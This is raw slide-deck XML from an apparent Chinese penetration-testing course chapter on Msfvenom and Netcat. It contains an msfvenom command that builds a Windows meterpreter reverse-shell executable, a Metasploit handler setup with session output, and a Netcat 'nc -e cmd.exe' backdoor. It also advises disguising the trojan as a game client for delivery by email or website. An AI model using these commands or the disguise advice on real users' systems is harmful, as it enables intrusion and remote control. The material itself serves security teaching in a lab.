                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143637" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30861" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17359" y="413458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7715" y="374824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1928" y="331404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="283210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123" y="233251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12488" y="187608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28090" y="146269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49922" y="109222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77978" y="76453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111217" y="48946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148608" y="27541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190156" y="12244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235868" y="3062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338389" y="3426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387043" y="13699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431715" y="30806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472413" y="54733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="509143" y="85471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540415" y="121604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564738" y="161723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582112" y="205824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592536" y="253899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596011" y="305943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4" name="Freeform 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="9144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5" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="990600"/>
            <a:ext cx="17811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AutoShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159726" y="8952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7" name="TextBox 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326254" y="970597"/>
            <a:ext cx="176530" cy="334645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 spc="1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sz="2000" spc="1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8" name="AutoShape 11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9" name="Freeform 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="17526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0" name="TextBox 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1828800"/>
            <a:ext cx="28860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1" name="AutoShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159726" y="17334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2" name="TextBox 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326254" y="180879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" name="Freeform 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="26670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4" name="TextBox 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2743200"/>
            <a:ext cx="3733800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5" name="AutoShape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159726" y="26478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6" name="TextBox 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326254" y="272319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7" name="Freeform 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="363855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28" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="3714750"/>
            <a:ext cx="17811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知识储备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" name="AutoShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159726" y="361943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0" name="TextBox 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326254" y="3694747"/>
            <a:ext cx="176530" cy="334645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 spc="1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sz="2000" spc="1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1" name="Freeform 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="447675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2" name="TextBox 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="4552950"/>
            <a:ext cx="28860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" name="AutoShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159726" y="445763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4" name="TextBox 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326254" y="453294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5" name="Freeform 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="539115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6" name="TextBox 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5467350"/>
            <a:ext cx="3733800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7" name="AutoShape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159726" y="537203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8" name="TextBox 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326254" y="544734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600200"/>
            <a:ext cx="10186035" cy="27273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使用Msfvenom的一般思路如下：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	识别漏洞：首先，攻击者需要发现目标操作系统的漏洞点。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	生成木马：利用Msfvenom，根据目标系统的漏洞，生成相应的后门程序。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	传输木马：将生成的木马程序以某种方式传输到目标系统上。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	执行木马：在目标系统上执行木马程序。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	设置监听：在攻击机上设置监听器，准备接收来自目标系统的信息。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	获取控制：一旦木马在目标系统上运行，攻击者就可以通过Meterpreter等工具获得对目标系统的控制。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(7)	远程控制：利用Meterpreter，攻击者可以执行远程命令，访问文件系统，甚至进行更深层次的系统操作。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181100"/>
            <a:ext cx="10186035" cy="1017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Msfvenom提供了丰富的基本参数，允许用户根据具体的攻击需求定制化生成木马，如表8-1所示，这些参数包括但不限于有效载荷类型、传输方式、监听选项等。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438400"/>
            <a:ext cx="6737350" cy="4419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86200" y="2057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表8-1 Msfvenom的基本参数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181100"/>
            <a:ext cx="10186035" cy="1017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Msfvenom可以使用payload（攻击载荷）来建立目标机与攻击机稳定连接的，可返回shell，也可以进行程序注入等，可以远程控制操作系统。使用msfvenom -l payloads命令查看当前工具有哪些payload，如图8-2所示。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2" descr="17578328-a426ad9e8ae5b495"/>
          <p:cNvPicPr/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6136005" cy="342963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267200" y="6096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图8-2列出所有payload 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181100"/>
            <a:ext cx="10186035" cy="1017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1.Netcat版本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200" y="1524000"/>
            <a:ext cx="111810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简称nc，最初由Hobbit开发，它最早是一个简单的TCP/IP工具，旨在为黑客提供一个简单的工具，用于在网络上传输数据。Netcat是一款流行的网络工具，它可以在不同的操作系统上运行，包括Windows，Linux和macOS等。Netcat可以用来进行网络通信、文件传输、端口扫描、反向连接、加密通信以及远程管理等多种功能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353435"/>
            <a:ext cx="6163310" cy="35274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343400" y="2895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表8-2  Netcat版本及说明</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b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181100"/>
            <a:ext cx="10186035" cy="1017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2.Netcat功能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200" y="1524000"/>
            <a:ext cx="10535285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是一个功能全面且灵活的网络工具，以其简洁的设计和强大的功能，在网络通信、文件传输、端口扫描、反向连接、加密通信和远程管理等多个领域中发挥着巨大作用。它的历史证明了，即使是最基础的工具，也能成为网络专家手中的利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网络通信：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的网络通信功能是其核心，它能够在不同计算机间建立TCP或UDP连接。这使得netcat成为创建简易聊天程序或进行数据传输的理想选择。企业可以利用它建立内部通信渠道，促进员工间快速沟通；信息安全研究人员则可以借助netcat进行网络探测和数据包分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文件传输：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netcat的文件传输能力，为跨计算机文件共享提供了极大的便利。无论是企业内部部门间的文件交换，还是将文件传输至云端存储，netcat都能高效完成。研究者也能通过netcat在不同实验室间安全地传输数据。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端口扫描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：netcat的端口扫描功能，对网络管理员和安全研究人员来说极为有用。它能够帮助快速识别开放端口和可用服务，确保网络中的计算机得到适当保护，同时发现潜在的漏洞和安全问题。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181100"/>
            <a:ext cx="10186035" cy="1017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7800" y="10668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2.Netcat功能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775" y="1447800"/>
            <a:ext cx="10716260" cy="5492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反向连接：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netcat的反向连接技术允许目标计算机主动连接到控制者的计算机，这一特性在绕过防火墙和nAT等信息安全措施时显得尤为关键。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加密通信：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netcat支持使用SSL或TLS等加密协议，确保通信内容的安全性，这对于需要保护敏感数据的通信场景至关重要。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远程管理：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netcat的远程管理功能，使系统管理员能够执行运行shell命令、重启计算机等操作，提高了对远程计算机的控制能力。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的应用场景非常广泛，适用于企业、政府机构、安全公司和研究人员等不同领域。无论是用于建立内部通信渠道，还是用于分析网络数据包，netcat都显示出其强大的功能。它不仅能够提高工作效率，还能在网络安全领域提供深入的分析和测试能力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以其多功能性成为网络工具箱中的多面手。它在网络安全领域的作用不可或缺，在系统管理、数据传输和远程操作等方面也展现出独特的优势。对于寻求高效、可靠网络工具的用户来说，netcat无疑是一个值得尝试的强大工具。在任何需要网络通信、文件传输、端口扫描或网络测试的场景中，netcat都是一个理想的选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Netcat简介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3300" y="1181100"/>
            <a:ext cx="10186035" cy="1017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000" y="13716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Netcat基本参数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533400"/>
            <a:ext cx="8251825" cy="67494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10200" y="76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表8-3  Netcat的基本参数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PART05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Msfvenom生成木马后门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430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1.生成后门文件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43000" y="1543685"/>
            <a:ext cx="105225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在使用后门之前，先使用Msfvenom生成一个在32位Windows系统可执行且带病毒的文件，命令如下：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&gt;msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.127 LPORT=4444 -a x86 --platform Windows -f exe &gt; reverse_tcp.exe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使用ls命令查看生成的reverse_tcp.exe文件，如图8-3所示。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454910" y="3429000"/>
            <a:ext cx="728281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4572000" y="4648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图8-3 生成病毒文件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Msfvenom生成木马后门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430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2.在靶机中运行并监听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43000" y="1676400"/>
            <a:ext cx="1052258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生成后就需要想办法将文件传给目标了，可以放到网站上，也可以邮件发过去，名字改成有点吸引力一些，或者伪装成游戏客户端之类的。只要目标靶机用户运行该文件，就能获取到靶机对应的session。使用Metasploit中的handler模块进行监听，命令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&gt; use exploit/multi/handler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[*] Using configured payload generic/shell_reverse_tcp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这里使用的payload为shell_reverse_tcp，但不是我们需要的payload，切换为reverse_tcp，命令如下：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 set payload windows/meterpreter/reverse_tcp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PART01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Msfvenom生成木马后门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1430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2.在靶机中运行并监听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2000" y="1981200"/>
            <a:ext cx="444373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设置攻击机IP和端口分别为10.10.10.127、4444，命令如下：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 set LHOST 10.10.10.127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 set LPORT 4444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29555" y="1181100"/>
            <a:ext cx="632904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使用show options看一下需要设置的参数，命令和运行结果如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>msf6 exploit(multi/handler)&gt; show options</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Module options (exploit/multi/handler):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Name   Current Setting    Required     Description</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>——    ————————    ————      ——————</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Payload options (windows/meterpreter/reverse_tcp):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Name      Current Setting     Required    Description</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>——       ————————     —————   ——————</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>EXITFUNC process             yes     Exit technique (Accepted: , seh, thread, process, none)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>LHOST   10.10.10.127       yes     The listen address (an interface may be specified)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>LPORT    4444                   yes      The listen port</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Exploit target:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Id        Name</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>——      ——</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>0         Wildcard Target</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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Msfvenom生成木马后门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0128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2.在靶机中运行并监听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9015" y="1411605"/>
            <a:ext cx="1017397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设置好参数就可以跑起来，开始监听，命令如下：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 run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[*]started reverse TCP handler on 10.10.10.127:4444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当目标执行了文件时，攻击机就会收到session，使用sessions -l 命令查看：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 sessions -l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Active sessions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Id  Name   Type                        Information    Connection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          shell                                       10.10.10.127:4444-&gt;10.10.10.130:1052(10.10.10.130)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          meterpreter x86/windows ABC\nhic@ABC  10.10.10.127:4444-&gt;10.10.10.130:1052(10.10.10.130)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选择可用的session，就能在靶机上执行命令了，输入命令sessions -i 2后，显示Meterpreter &gt;后，就说明已经拿到靶机的权限，可以在靶机上操作对应的命令了。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msf6 exploit(multi/handler) &gt; sessions -i 2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[*]starting interaction with 2 ...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Meterpreter &gt;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Netcat实现通信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0128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1.Netcat软件的获取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524000"/>
            <a:ext cx="1061402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	在Kali linux安装Netcat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使用yum源安装，命令如下：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yum install -y nc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	在Windows安装Netcat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Netcats可以在官网上下载，下载页面如图8-4所示，注意下载前先关闭杀毒软件，以免误杀。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2819400" y="3923665"/>
            <a:ext cx="5885815" cy="25571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1910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图8-4 Netcat下载页面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Netcat实现通信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0668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2.服务端和客户端的文字通信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524000"/>
            <a:ext cx="106140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实验环境如图8-5所示：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200400" y="2133600"/>
            <a:ext cx="4895215" cy="25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343400" y="4800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图8-5 实验环境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Netcat实现通信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0668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2.服务端和客户端的文字通信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524000"/>
            <a:ext cx="1061402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NC服务端：Windows 7系统，ip地址为10.10.10.130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NC客户端：Kali linux ,ip地址为10.10.10.127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在Windows服务端下载Netcat，并放置在桌面，运行命令提示符，执行以下命令：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C:\Users\ABC&gt;cd Desktop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C:\Users\ABC\Desktop&gt;nc.exe -l -p 4444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此时服务端在本地端口4444上进行监听。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在Kali linux中，为了和服务端进行连接，执行以下命令：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#nc 10.10.10.130 4444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此时，服务端和客户端已进行连接，无论在服务端或者在客户端输入任何信息，它们都会即时同步到对方的屏幕，实现了服务端与客户端之间的通信。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如输入Hello，对方的屏幕都会出现Hello。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Netcat实现通信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6350" y="10668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3.服务端和客户端之间文件传输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00200"/>
            <a:ext cx="1061402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当服务端和客户端连接后，就可以相互传输文件。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在服务端创建文件abc.txt，内容为Hello world！并放置在桌面，执行命令：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C:\Users\ABC&gt;cd Desktop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C:\Users\ABC\Desktop&gt;nc.exe -l -p 4444 &lt; abc.txt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在客户端接收文件，并查看文件内容，命令如下：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[root@kali]#nc 10.10.10.130 4444 &gt; abc.txt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[root@kali]#cat abc.txt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Hello world!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结果显示，服务端成功把文件传输到客户端；当然，客户端也可以把文件传输给服务端。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在Windows建立后门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1600" y="121920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实验环境和目标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ClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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为了获取目标主机Windows系统的命令执行权限，可以使用Netcat在Windows系统中建立后门，建立与攻击机的连接，来实现执行目标主机命令的功能。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后门服务端：Windows 7系统，ip地址为10.10.10.130；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后门客户端：Kali linux ,ip地址为10.10.10.127。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目标：实现在Kali linux中使用Windows系统的cmd.exe程序。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在Windows建立后门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2.在Windows系统中建立后门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利用Netcat在Windows系统中进行监听，执行以下命令：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C:\Users\ABC&gt;cd Desktop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C:\Users\ABC\Desktop&gt;nc.exe -l -p 4444 -e cmd.exe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命令中-e cmd.exe表示连接上Netcat的监听服务的客户端将可以使用cmd.exe程序，并可以执行相对应的命令。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在Windows建立后门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3.客户端连接后门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在Kali linux中打开终端，并执行以下命令：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[root@kali]#nc 10.10.10.130 4444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命令执行后，成功连接上Windows系统后门服务端，如图8-6所示。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6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="46097"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3211195"/>
            <a:ext cx="5554345" cy="23831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81400" y="5791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图8-6 成功连接上Windows系统后门服务端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在Windows建立后门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3.客户端连接后门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执行dir命令，可以查询到Windows当前文件夹的相关信息，如图8-7所示。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1110" y="5562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图8-7 查看Windows服务端相关文件信息</a:t>
            </a:r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801110" y="2348865"/>
            <a:ext cx="3647440" cy="312039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90600" y="5867400"/>
            <a:ext cx="96272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至此，通过以上操作，Windows端成功建立木马后门，可以远程控制Windows系统。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2000250" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2000250" h="2105025">
                <a:moveTo>
                  <a:pt x="1922457" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2057171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60397" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106298" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152651" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199439" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246640" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294234" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342202" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390525" y="2105025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438845" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486812" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534406" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581605" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628392" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674745" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720645" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766071" y="2060979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811004" y="2049549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855425" y="2036868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899312" y="2022957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942646" y="2007836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985408" y="1991524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027576" y="1974041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069132" y="1955408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110056" y="1935645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150327" y="1914770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189925" y="1892805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228831" y="1869768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1267025" y="1845681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1304486" y="1820563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1341196" y="1794433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377133" y="1767313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412278" y="1739221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1446612" y="1710177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1480113" y="1680202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1512763" y="1649316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1544541" y="1617538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1575427" y="1584888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605402" y="1551387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634446" y="1517053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662538" y="1481908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689658" y="1445971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715788" y="1409261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740906" y="1371800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1764993" y="1333606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1788030" y="1294700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809995" y="1255102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830870" y="1214831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850633" y="1173907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869266" y="1132351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886749" y="1090183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903061" y="1047421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1918182" y="1004087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="960200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="915779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="870846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="825420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="779520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="733167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="686380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="639181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="591587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="543620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000250" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="446979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="399012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="351418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="304219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="257432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="211079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="165179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="119753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="74820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="30399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922457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5811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581150" y="7048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581150" y="381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81150" y="5429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33350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333500" y="7048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333500" y="381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333500" y="5429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11239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123950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1123950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123950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885825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1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1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Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825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Freeform 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825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85825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Freeform 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63817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38175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38175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38175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Freeform 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3905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390525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390525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390525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Freeform 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191875" y="3619500"/>
            <a:ext cx="1000125" cy="3238500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1000125" h="3238500">
                <a:moveTo>
                  <a:pt x="1000125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548639"/>
